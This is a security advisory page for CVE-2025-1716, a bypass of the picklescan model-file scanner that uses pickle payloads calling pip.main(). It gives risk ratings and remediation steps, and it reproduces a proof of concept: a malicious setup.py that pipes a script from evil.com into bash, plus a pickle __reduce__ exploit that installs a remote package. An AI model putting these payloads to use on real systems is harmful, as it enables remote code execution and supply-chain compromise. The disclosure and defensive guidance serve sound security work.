CVE-2025-1716: picklescan: scanner bypass enables supply chain RCE

GHSA-655q-fx9r-782v MEDIUM PoC AVAILABLE
Published March 3, 2025
CISO Take

Picklescan, widely deployed as a security gate for ML model files, can be bypassed by crafting pickle payloads that invoke pip.main() — a legitimate function — to silently install malicious packages on deserialization. Any pipeline or MLOps workflow relying on picklescan as its primary defense against unsafe model files is currently exposed. Update picklescan to 0.0.22 immediately and add sandbox isolation around all pickle deserialization as defense-in-depth.

Risk Assessment

The CVSS medium rating undersells operational risk for AI/ML environments. The critical factor is control bypass: organizations that implemented picklescan specifically to protect model loading workflows now have a false sense of security. EPSS at ~4.2% combined with a public PoC elevates near-term exploitation probability. Attack surface is broad — any team using pickle-serialized models (PyTorch, scikit-learn, XGBoost, Hugging Face) with picklescan as gatekeeper is directly exposed. Severity is HIGH for ML-heavy organizations.

Affected Systems

Package Ecosystem Vulnerable Range Patched
picklescan pip <= 0.0.21 0.0.22
401 3 dependents Pushed 2mo ago 95% patched ~12d to patch Full package profile →

Do you use picklescan? You're affected.

Severity & Risk

CVSS 3.1
N/A
EPSS
16.2%
chance of exploitation in 30 days
Higher than 95% of all CVEs
Exploitation Status
Exploit Available
Exploitation: MEDIUM
Sophistication
Moderate
Exploitation Confidence
medium
Public PoC indexed (trickest/cve)
EPSS exploit prediction: 16%
Composite signal derived from CISA KEV, CISA SSVC, EPSS, trickest/cve, and Nuclei templates.

Recommended Action

6 steps
  1. PATCH

    Update picklescan to >= 0.0.22 immediately — the fix adds pip and related callables to the unsafe globals denylist.

  2. SCAN EXISTING ARTIFACTS

    Re-scan all stored pickle files in model registries and artifact stores with the updated version.

  3. ISOLATE

    Run all pickle deserialization in network-isolated sandboxes (containers without internet access, or with egress rules blocking PyPI/GitHub). This breaks the attack chain even if scanning is bypassed.

  4. MIGRATE FORMAT

    Prioritize migration to safetensors or ONNX for model serialization — eliminate pickle dependency where feasible.

  5. MONITOR

    Alert on unexpected pip invocations or package installations originating from model-loading processes (EDR/auditd/eBPF).

  6. VERIFY

    Audit any model file scanned by picklescan <= 0.0.21 that originated from external or untrusted sources before re-use.

CISA SSVC Assessment

Decision Track
Exploitation none
Automatable Yes
Technical Impact partial

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

Classification

Compliance Impact

This CVE is relevant to:

EU AI Act
Article 15 - Accuracy, robustness and cybersecurity Article 17 - Quality management system — supply chain
ISO 42001
6.1.2 - AI risk assessment 8.4 - AI system technical robustness and security
NIST AI RMF
GOVERN 1.7 - Processes for AI risk management in supply chain MAP 5.1 - Likelihood of supply chain risks
OWASP LLM Top 10
LLM03:2025 - Supply Chain Vulnerabilities

Frequently Asked Questions

What is CVE-2025-1716?

Picklescan, widely deployed as a security gate for ML model files, can be bypassed by crafting pickle payloads that invoke pip.main() — a legitimate function — to silently install malicious packages on deserialization. Any pipeline or MLOps workflow relying on picklescan as its primary defense against unsafe model files is currently exposed. Update picklescan to 0.0.22 immediately and add sandbox isolation around all pickle deserialization as defense-in-depth.

Is CVE-2025-1716 actively exploited?

Proof-of-concept exploit code is publicly available for CVE-2025-1716, increasing the risk of exploitation.

How to fix CVE-2025-1716?

1. PATCH: Update picklescan to >= 0.0.22 immediately — the fix adds pip and related callables to the unsafe globals denylist. 2. SCAN EXISTING ARTIFACTS: Re-scan all stored pickle files in model registries and artifact stores with the updated version. 3. ISOLATE: Run all pickle deserialization in network-isolated sandboxes (containers without internet access, or with egress rules blocking PyPI/GitHub). This breaks the attack chain even if scanning is bypassed. 4. MIGRATE FORMAT: Prioritize migration to safetensors or ONNX for model serialization — eliminate pickle dependency where feasible. 5. MONITOR: Alert on unexpected pip invocations or package installations originating from model-loading processes (EDR/auditd/eBPF). 6. VERIFY: Audit any model file scanned by picklescan <= 0.0.21 that originated from external or untrusted sources before re-use.

What systems are affected by CVE-2025-1716?

This vulnerability affects the following AI/ML architecture patterns: training pipelines, model serving, MLOps CI/CD pipelines, model repositories and registries, data science notebooks.

What is the CVSS score for CVE-2025-1716?

No CVSS score has been assigned yet.

Technical Details

NVD Description

### CVE-2025-1716 ### Summary An unsafe deserialization vulnerability in Python’s pickle module allows an attacker to bypass static analysis tools like Picklescan and execute arbitrary code during deserialization. This can be exploited to run pip install and fetch a malicious package, enabling remote code execution (RCE) upon package installation. ### Details Pickle’s deserialization process allows execution of arbitrary functions via the __reduce__ method. While Picklescan is designed to detect such exploits, this attack evades detection by leveraging pip.main() as the callable function. Since pip is a legitimate package operation, it may not raise red flags in security scans. The payload executes the following steps: 1. During unpickling, it calls pip.main() to install a malicious PyPI package. 2. The installed package runs arbitrary code via setup.py, entry_points, or post-install hooks. 3. Execution is silent, with minimal logging to avoid detection. ### PoC Step 1: Create the Malicious Package Host a PyPI package with a malicious setup.py or entry_point. Example malicious `setup.py` ``` from setuptools import setup import os os.system("curl -s https://evil.com/payload.sh | bash") # Executes remote shell script setup( name="rsac-demo-package", version="0.1", packages=["rsac_demo"], install_requires=[], ) ``` Upload it to PyPI or host on GitHub. Step 2: Exploit via Pickle ``` import pickle import pip class Exploit: def __reduce__(self): return pip.main, ( ['install', 'git+https://github.com/madgetr/rsac-demo-package', '--no-input', '-q', '-q', '-q', '--exists-action', 'i', '--isolated'], ) malicious_pickle = pickle.dumps(Exploit()) # Simulating deserialization attack pickle.loads(malicious_pickle) ``` This installs a malicious package from GitHub or PyPI. The payload runs automatically when unpickled, executing any code inside the installed package leveraging the `setup.py` file. ### Impact Remote Code Execution (RCE): Any system that deserializes a malicious pickle is compromised. Supply Chain Attack: Attackers can distribute infected pickle files across ML models, APIs, or saved Python objects. Bypasses Picklescan: Security tools may not flag pip.main(), making it harder to detect. ### Recommended Fixes Add `"pip": "*"` to the list of [unsafe globals](https://github.com/mmaitre314/picklescan/blob/25d753f4b9a27ce141a43df3bf88d731800593d9/src/picklescan/scanner.py#L96)

Exploitation Scenario

An adversary targets an ML team's internal model registry. They craft a PyTorch model file serialized with pickle that uses __reduce__ to invoke pip.main(['install', 'git+https://github.com/attacker/malicious-pkg', '--isolated', '-q', '-q', '-q']). The malicious package's setup.py executes a reverse shell or deploys a credential harvester. The attacker uploads this file to a public model hub (Hugging Face, GitHub) or injects it via a compromised dependency. The ML team's CI/CD pipeline downloads the model, runs picklescan (version <= 0.0.21), receives a clean result since pip.main is not in the unsafe globals list, and proceeds to load the model in production. Deserialization triggers the pip install silently. The malicious package executes with the same privileges as the model serving process — often a service account with access to cloud credentials, training data, and inference infrastructure.

Timeline

Published
March 3, 2025
Last Modified
April 9, 2025
First Seen
March 24, 2026

Related Vulnerabilities